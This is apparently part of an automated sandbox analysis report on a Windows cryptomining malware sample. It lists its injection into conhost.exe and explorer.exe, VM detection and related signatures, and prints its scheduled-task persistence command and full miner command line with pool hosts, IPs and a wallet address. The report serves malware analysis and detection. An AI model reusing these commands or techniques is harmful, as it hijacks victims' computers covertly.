Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 35000 Jump to behavior
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.23.214.117 144 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: xmr.givemexyz.in
Writes to foreign memory regions
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Memory written: C:\Windows\System32\conhost.exe base: 25F5EDE0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 2C94E0E0000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 886010 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 2A780EE0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 16CC3390000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: DB8010 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Memory allocated: C:\Windows\System32\conhost.exe base: 25F5EDE0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2C94E0E0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2A780EE0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 16CC3390000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140000000 value: 4D Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140001000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140367000 value: 1E Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 1404A0000 value: F0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140753000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140775000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140776000 value: C5 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140777000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140779000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077B000 value: 60 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077C000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077D000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 886010 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140000000 value: 4D Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140001000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140367000 value: 1E Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 1404A0000 value: F0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140753000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140775000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140776000 value: C5 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140777000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140779000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077B000 value: 60 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077C000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077D000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: DB8010 value: 00 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6764 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6784 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Thread created: C:\Windows\System32\conhost.exe EIP: 5EDE0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 4E0E0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 80EE0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: C3390000 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 513056 Sample: pcNCraWcRk Startdate: 01/11/2021 Architecture: WINDOWS Score: 100 58 xmr.givemexyz.in 2->58 64 Sigma detected: Xmrig 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 6 other signatures 2->70 11 pcNCraWcRk.exe 2->11         started        14 services64.exe 2->14         started        signatures3 process4 signatures5 90 Writes to foreign memory regions 11->90 92 Allocates memory in foreign processes 11->92 94 Creates a thread in another existing process (thread injection) 11->94 16 conhost.exe 5 11->16         started        96 Antivirus detection for dropped file 14->96 98 Multi AV Scanner detection for dropped file 14->98 19 conhost.exe 6 14->19         started        process6 file7 50 C:\Users\user\AppData\...\services64.exe, PE32+ 16->50 dropped 52 C:\Users\...\services64.exe:Zone.Identifier, ASCII 16->52 dropped 22 cmd.exe 1 16->22         started        24 cmd.exe 1 16->24         started        54 C:\Users\user\AppData\...\sihost64.exe, PE32+ 19->54 dropped 72 Injects code into the Windows Explorer (explorer.exe) 19->72 74 Writes to foreign memory regions 19->74 76 Modifies the context of a thread in another process (thread injection) 19->76 78 2 other signatures 19->78 27 sihost64.exe 19->27         started        29 explorer.exe 19->29         started        signatures8 process9 signatures10 31 services64.exe 22->31         started        34 conhost.exe 22->34         started        80 Uses schtasks.exe or at.exe to add and modify task schedules 24->80 36 conhost.exe 24->36         started        38 schtasks.exe 1 24->38         started        82 Antivirus detection for dropped file 27->82 84 Multi AV Scanner detection for dropped file 27->84 86 Writes to foreign memory regions 27->86 88 2 other signatures 27->88 40 conhost.exe 2 27->40         started        process11 signatures12 108 Writes to foreign memory regions 31->108 110 Allocates memory in foreign processes 31->110 112 Creates a thread in another existing process (thread injection) 31->112 42 conhost.exe 2 31->42         started        process13 file14 56 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 42->56 dropped 100 Injects code into the Windows Explorer (explorer.exe) 42->100 102 Writes to foreign memory regions 42->102 104 Modifies the context of a thread in another process (thread injection) 42->104 106 Injects a PE file into a foreign processes 42->106 46 explorer.exe 42->46         started        signatures15 process16 dnsIp17 60 198.23.214.117, 49763, 8080 AS-COLOCROSSINGUS United States 46->60 62 xmr.givemexyz.in 46->62 114 System process connects to network (likely due to code injection or exploit) 46->114 116 Query firmware table information (likely to detect VMs) 46->116 signatures18 118 Detected Stratum mining protocol 60->118
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.23.214.117
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
xmr.givemexyz.in 212.114.52.24 true